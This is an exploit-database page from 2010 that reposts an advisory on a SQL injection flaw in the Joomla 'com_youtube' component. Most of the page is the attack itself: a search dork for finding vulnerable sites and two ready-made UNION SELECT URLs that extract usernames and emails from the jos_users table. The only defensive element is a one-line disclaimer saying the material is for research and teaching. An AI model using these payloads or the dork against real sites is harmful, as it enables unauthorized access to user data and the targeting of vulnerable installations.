Sign in

Joomla Component (com_youtube) SQL Injection Vulnerability

SEBUG-ID:19981
SEBUG-Appdir:Joomla
Published:2010-07-24
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
# Exploit Title: Joomla "com_youtube"  Sql Injection Vulnerability
# Date: 2010-07-24
 
# Author: Forza-Dz
 
# Software Link: http://extensions.joomla.org/extensions/multimedia/
multimedia-channels/video-channels/12037
# Version: 1.5
# Tested on: windows-xp-sp2-fr : windows-xp-sp3-fr
 
 
==============================================================================
\\\\\\\\\\ Joomla "com_youtube" Sql Injection Vulnerability /////////
==============================================================================
   
***************************************************************************
***************************************************************************
Dork = inurl:"com_youtube"
###########################################################################
 ===[ Exploit ]===
http://www.site.com/index.php?option=com_youtube&id_cate=4
 
union+select+1,concat(username,0x3a,email),3,4,5,6,7,8+from+jos_users--
or
http://www.site.com/index.php?option=com_youtube&id_cate=55
union+select+1,concat(username,0x3a,email),3,4,5,6,7,8+from+jos_users--
###########################################################################
Greetz @ Flit0x-Dz AnD MCA-CRB All "DZ" "MusliM"          
###########################################################################
// sebug.net [2010-07-26]